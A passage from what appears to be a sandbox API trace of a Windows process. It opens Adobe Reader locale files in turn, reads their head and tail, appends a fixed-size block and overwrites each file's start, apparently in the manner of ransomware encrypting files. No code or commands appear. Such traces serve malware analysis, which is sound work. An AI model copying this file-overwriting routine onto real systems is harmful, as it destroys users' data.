nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.661] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1200 [0082.662] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.664] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1200 [0082.664] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.665] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.665] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.665] CloseHandle (hObject=0x1cc) returned 1 [0082.665] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Checkers.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\checkers.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.673] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.673] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x15a00 [0082.673] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.673] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.673] ReleaseMutex (hMutex=0x168) returned 1 [0082.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.KOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.KOR", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.KOR", lpUsedDefaultChar=0x0) returned 12 [0082.674] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.116] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x14a00 [0083.116] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.117] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x14a00 [0083.117] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.117] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.118] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.118] CloseHandle (hObject=0x1cc) returned 1 [0083.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\pddom.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\pddom.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.119] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.119] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2400 [0083.120] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.120] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.120] ReleaseMutex (hMutex=0x168) returned 1 [0083.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.KOR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0083.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.KOR", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.KOR", lpUsedDefaultChar=0x0) returned 9 [0083.120] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.122] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1400 [0083.122] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.123] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1400 [0083.123] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.123] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.123] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.123] CloseHandle (hObject=0x1cc) returned 1 [0083.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.124] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.125] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x95f7 [0083.125] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.125] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.125] ReleaseMutex (hMutex=0x168) returned 1 [0083.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0083.125] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.127] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x85f7 [0083.128] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.129] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x85f7 [0083.129] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.129] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.129] WriteFile (in: hFile=0x1cc, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.129] CloseHandle (hObject=0x1cc) returned 1 [0083.130] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Annots.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\annots.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x75c00 [0083.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.131] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.131] ReleaseMutex (hMutex=0x168) returned 1 [0083.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.NOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.NOR", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.NOR", lpUsedDefaultChar=0x0) returned 10 [0083.132] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0083.133] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x74c00 [0083.134] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.135] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x74c00 [0083.136] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.136] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.137] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0083.137] CloseHandle (hObject=0x1cc) returned 1 [0083.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\makeaccessible.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\makeaccessible.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.138] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.138] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x12200 [0083.138] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.138] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.139] ReleaseMutex (hMutex=0x168) returned 1 [0083.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.NOR", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0083.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.NOR", cchWideChar=18, lpMultiByteStr=0x1f88a64, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.NOR", lpUsedDefaultChar=0x0) returned 18 [0083.139] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.141] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11200 [0083.141] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.142] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11200 [0083.142] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.142] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.142] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.142] CloseHandle (hObject=0x1cc) returned 1 [0083.143] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Search.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\search.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.143] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.144] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x5800 [0083.144] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.144] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.144] ReleaseMutex (hMutex=0x168) returned 1 [0083.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.NOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.NOR", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.NOR", lpUsedDefaultChar=0x0) returned 10 [0083.144] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.147] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4800 [0083.147] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.148] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4800 [0083.149] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.149] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.149] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.149] CloseHandle (hObject=0x1cc) returned 1 [0083.149] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Acroform.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\acroform.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.150] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.150] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x69400 [0083.150] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.150] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.150] ReleaseMutex (hMutex=0x168) returned 1 [0083.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.NLD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.NLD", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.NLD", lpUsedDefaultChar=0x0) returned 12 [0083.151] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0083.711] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x68400 [0083.711] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.713] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x68400 [0083.714] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.714] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0083.714] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0083.714] CloseHandle (hObject=0x1cc) returned 1 [0083.715] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\EScript.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\escript.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0083.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0083.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa400 [0083.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 